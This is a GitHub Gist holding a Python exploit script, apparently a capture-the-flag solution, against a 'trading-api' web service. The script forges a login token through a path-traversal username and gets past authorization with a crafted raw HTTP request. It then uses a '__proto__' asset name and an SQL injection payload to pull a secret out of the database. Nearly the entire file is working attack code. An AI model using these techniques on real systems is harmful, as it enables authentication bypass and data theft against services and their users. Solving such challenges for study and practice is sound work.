Created
December 7, 2022 12:29
-
-
Save hatunaa/37e7908417eeefd35b15dfa7c97f7564 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import argparse | |
import requests | |
import json | |
from urllib.parse import quote | |
from pwn import remote, log | |
def authn_bypass(base, additional_data=''): | |
r = requests.post(f'{base}/api/auth/login', json={ | |
'username': f'../../health?{additional_data}', | |
'password': 'x', | |
}) | |
return json.loads(r.text)['token'] | |
def request_bypass_authz(host, port, method, path, token, body=''): | |
c = remote(host, port, level='error') | |
req = (f'{method} {path} HTTP/1.1\r\n' + | |
f'host: {host}\r\n' + | |
'connection: close\r\n' + | |
f'authorization: {token}\r\n' + | |
f'content-length: {len(body)}\r\n' + | |
'\r\n' + | |
body) | |
c.send(req.encode('utf-8')) | |
return c.recvall().decode('utf-8').split('\r\n\r\n')[1] | |
def create_tx(host, port, token, asset, action): | |
res = request_bypass_authz(host, port, 'PUT', f'http://tuandv.com/api/priv/assets/{quote(asset)}/{quote(action)}', token) | |
return json.loads(res)['id'] | |
def get_tx(host, port, token, tx_id): | |
r = requests.get(f'http://{host}:{port}/api/transactions/{quote(str(tx_id))}', headers={ | |
'authorization': token, | |
}) | |
return json.loads(r.text) | |
def exploit(host, port): | |
log.info('Creating JWT') | |
token = authn_bypass(f'http://{host}:{port}', additional_data='::txId') | |
log.info(f'Token: {token}') | |
tx_id = create_tx(host, port, token, '__proto__', "'||(select secret_haha from secret_haha)||'") | |
log.info(f'Created transaction: {tx_id}') | |
transaction = get_tx(host, port, token, tx_id) | |
log.info(f'Transaction: {transaction}') | |
flag = transaction['username'][13:] | |
log.success(f'Secret in database: {flag}') | |
def main(): | |
parser = argparse.ArgumentParser(description='trading-api exploit') | |
parser.add_argument('host', help='Host name') | |
parser.add_argument('port', help='Port', type=int) | |
args = parser.parse_args() | |
exploit(args.host, args.port) | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment